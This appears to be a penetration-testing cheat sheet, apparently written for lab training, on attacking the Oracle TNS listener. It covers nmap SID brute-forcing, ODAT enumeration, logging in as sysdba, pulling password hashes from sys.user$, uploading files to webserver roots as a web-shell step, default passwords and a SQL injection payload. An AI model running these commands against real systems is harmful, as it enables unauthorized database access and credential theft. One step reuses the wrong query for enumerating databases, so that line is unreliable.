Skip to content

1521 - Oracle Transparent Network Substrate (TNS)

The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries.

Addittionaly, it supports IPv6 and SSL/TLS encryption, which make it suitable for Name resolution, Connection management, Load balancing, Security.

Oracle TNS is often used with other Oracle services like Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many more:

  • Oracle Enterprise Manager: tool for start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance.

Footprinting Oracle TNS

Let's now use nmap to scan the default Oracle TNS listener port:

sudo nmap -p1521 -sV $ip --open

Enumerating SIDs

In Oracle relational databases, also known as Oracle RDBMS, there are System Identifiers (SID).

System Identifiers (SID) are a unique name that identifies a particular database instance. It can have multiple instances, each with its own System ID. An instance is a set of processes and memory structures that interact to manage the database's data.

The client uses this SID to identify which database instance it wants to connect to. If there is not a SID in the request, then, the default value defined in the tnsnames.ora file is used.

sudo nmap -p1521 -sV $ip --open --script oracle-sid-brute

More enumeration with ODAT

We can use the odat.py from ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations,...

/odat.py all -s $ip

Addittionaly, if you have sysdba admin rights, you might upload a web shell to the target (more in odat)

Connect to Oracle database: sqlplus

If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

sqlplus <username>/<password>@$ip/XE;
# Whereas XE has been identified with Odat as a valid SID

sqlplus <username>/<password>@$ip/XE as sysdba

In case of this error message ( sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with libraries. Possible solution:

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

The System Database Admin in an Oracle RDBMS is sysdba. If an user has more privileges that they should have we can try to exploit it as sysdba.

sqlplus <user>/<password>@$ip/XE as sysdba

Upload a web shell

If we have sysdba admin rights, we might upload a webshell to the target. This requires the server to run a webserver, and we need to know the exact location of the root directory for the webserver. However, these are typical default paths for webservers:

OS Path
Linux /var/www/html
Windows C:\inetpub\wwwroot
# 1. Create a non suspicious web shell 
echo "Oracle File Upload Test" > testing.txt

# 2. Upload  the shell to linux (/var/www/html) or windows (C:\\inetpub\\wwwroot):
./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

## 3. Test if the file upload approach worked with curl, or visit via browser.
curl -X GET http://$ip/testing.txt

Oracle basic commands

# List all available tables in the current database
select table_name from all_tables;

# Show the privileges of the current user
select * from user_role_privs;

# If we have sysdba admin rights, we might:
    ## 1. enumerate all databases
select * from user_role_privs;

    ## 2. extract Password Hashes
select name, password from sys.user$;

    ## 3. upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.
    ## 1. Creating a non suspicious web shell 
echo "Oracle File Upload Test" > testing.txt
    ## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\inetpub\\wwwroot):
./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

How does Oracle TNS work

Technical components

The listener:

By default, the listener (listener.ora) listens for incoming connections on the TCP/1521 port. However, this default port can be changed during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk. The listener can also support multiple network interfaces and listen on specific IP addresses or all available network interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

Additionally, the listener will use Oracle Net Services to encrypt the communication between the client and the server.

Configuration files for Oracle TNS

The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. The client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.

tnsnames.ora

Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the database or service name that clients should use when connecting to the service.

Code: txt
>ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

listener.ora

The listener.ora file is a server-side configuration file that defines the listener process's properties and parameters, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.

SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = PDB1)
      (ORACLE_HOME = C:\oracle\product\19.0.0\dbhome_1)
      (GLOBAL_DBNAME = PDB1)
      (SID_DIRECTORY_LIST =
        (SID_DIRECTORY =
          (DIRECTORY_TYPE = TNS_ADMIN)
          (DIRECTORY = C:\oracle\product\19.0.0\dbhome_1\network\admin)
        )
      )
    )
  )

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

ADR_BASE_LISTENER = C:\oracle

Default passwords

  • Oracle 9 has a default password, CHANGE_ON_INSTALL.
  • Oracle 10 has no default password set.
  • The Oracle DBSNMP service also uses a default password, dbsnmp.

PL/SQL Exclusion List

Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance. It serves as a blacklist that cannot be accessed through the Oracle Application Server.

Setting Description
DESCRIPTION A descriptor that provides a name for the database and its connection type.
ADDRESS The network address of the database, which includes the hostname and port number.
PROTOCOL The network protocol used for communication with the server
PORT The port number used for communication with the server
CONNECT_DATA Specifies the attributes of the connection, such as the service name or SID, protocol, and database instance identifier.
INSTANCE_NAME The name of the database instance the client wants to connect.
SERVICE_NAME The name of the service that the client wants to connect to.
SERVER The type of server used for the database connection, such as dedicated or shared.
USER The username used to authenticate with the database server.
PASSWORD The password used to authenticate with the database server.
SECURITY The type of security for the connection.
VALIDATE_CERT Whether to validate the certificate using SSL/TLS.
SSL_VERSION The version of SSL/TLS to use for the connection.
CONNECT_TIMEOUT The time limit in seconds for the client to establish a connection to the database.
RECEIVE_TIMEOUT The time limit in seconds for the client to receive a response from the database.
SEND_TIMEOUT The time limit in seconds for the client to send a request to the database.
SQLNET.EXPIRE_TIME The time limit in seconds for the client to detect a connection has failed.
TRACE_LEVEL The level of tracing for the database connection.
TRACE_DIRECTORY The directory where the trace files are stored.
TRACE_FILE_NAME The name of the trace file.
LOG_FILE The file where the log information is stored.

Extra Bonus: DUAL

The DUAL is a special one row, one column table present by default in all Oracle databases. The owner of DUAL is SYS, but DUAL can be accessed by every user. This is a possible payload for SQLi:

'+UNION+SELECT+NULL+FROM+dual--

Oracle syntax requires the use of FROM, but some queries don't requires any table. For these case we use DUAL. Also Oracle doesn't allow the queries that employ information_schema.tables.

Last update: 2024-09-07
Created: June 29, 2023 14:54:11